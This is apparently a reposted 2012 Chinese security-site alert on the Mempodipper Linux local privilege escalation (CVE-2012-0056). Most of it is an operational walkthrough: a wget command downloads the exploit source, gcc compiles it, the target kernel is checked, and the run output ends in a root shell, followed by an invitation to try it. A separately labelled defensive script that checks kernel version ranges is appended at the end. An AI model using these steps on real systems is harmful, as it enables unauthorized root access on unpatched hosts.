myhack58 | Anonymous | MYHACK58:62201233291
History: Mar 08, 2012 - 12:00 a.m.

Linux 2.6.39 to 3.2.0 local privilege escalation vulnerability disclosed - vulnerability alert - myhack58 (Heibai Security Net)

2012-03-08 00:00:00
Anonymous
www.myhack58.com

6.9 Medium (CVSS2)

Access Vector: LOCAL
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C

EPSS: 0.001 Low
Percentile: 46.4%

1. Download the exploit file

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2. Compile

gcc mempodipper.c -o mempodipper

3. Check the environment before running

netcat@netcat:~$ uname -r

3.0.0-12-generic

netcat@netcat:~$ cat /etc/issue

Ubuntu 11.10 \n \l

netcat@netcat:~$ uname -a

Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux

netcat@netcat:~$ id

uid=1000(netcat) gid=1000(netcat) groups=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)

4. Run the exploit

netcat@netcat:~$ ./mempodipper

===============================

= Mempodipper =

= by zx2c4 =

= Jan 21, 2012 =

===============================

[+] Ptracing su to find next instruction without reading binary.

[+] Creating ptrace pipe.

[+] Forking ptrace child.

[+] Waiting for ptraced child to give output on syscalls.

[+] Ptrace_traceme'ing process.

[+] Error message written. Single stepping to find address.

[+] Resolved call address to 0x8049570.

[+] Opening socketpair.

[+] Waiting for transferred fd in parent.

[+] Executing child from child fork.

[+] Opening parent mem /proc/3012/mem in child.

[+] Sending fd 6 to parent.

[+] Received fd at 6.

[+] Assigning fd 6 to stderr.

[+] Calculating su padding.

[+] Seeking to offset 0x8049564.

[+] Executing su with shellcode.

sh-4.2#

From http://www.4shell.org/archives/2149.html

Try it yourself and see the effect!
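For a defender the first question is whether a host's kernel even falls inside the 2.6.39 to 3.2.0 range named in the headline. The script below is an added example, not part of the original post or of zx2c4's code: a POSIX sh function that parses a `uname -r` string (such as the `3.0.0-12-generic` shown above) and reports whether it lies in that range. It assumes the range is inclusive and compares version numbers only, so a hit on a distribution kernel that backported the fix is a prompt to check vendor errata for CVE-2012-0056, not proof of exposure.

```shell
#!/bin/sh
# Added example: classify a kernel release string against the 2.6.39..3.2.0
# range this advisory names. Version comparison only; vendors that backported
# the CVE-2012-0056 fix still report a release inside the range.

# Turn "3.0.0-12-generic" into one comparable integer (major*1e6+minor*1e3+patch).
# Assumes the numeric part is dotted; anything after '-' or a letter is ignored.
kernel_version_number() {
    kvn_rel=${1%%-*}                    # drop "-12-generic"
    kvn_rel=${kvn_rel%%[!0-9.]*}        # drop suffixes such as "rc1"
    kvn_ifs=$IFS; IFS=.
    set -- $kvn_rel                     # split on dots into $1 $2 $3 ...
    IFS=$kvn_ifs
    echo $(( ${1:-0} * 1000000 + ${2:-0} * 1000 + ${3:-0} ))
}

# Exit 0 when the release is within 2.6.39..3.2.0 (inclusive, per the headline).
kernel_in_affected_range() {
    kiar_n=$(kernel_version_number "$1")
    kiar_lo=$(kernel_version_number "2.6.39")
    kiar_hi=$(kernel_version_number "3.2.0")
    [ "$kiar_n" -ge "$kiar_lo" ] && [ "$kiar_n" -le "$kiar_hi" ]
}

# Report on a given release string, or on this host when none is given.
check_kernel() {
    ck_target=${1:-$(uname -r)}
    if kernel_in_affected_range "$ck_target"; then
        printf '%s: inside 2.6.39..3.2.0, check vendor errata for CVE-2012-0056\n' "$ck_target"
    else
        printf '%s: outside the range named in the advisory\n' "$ck_target"
    fi
}

check_kernel "${1:-}"
```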
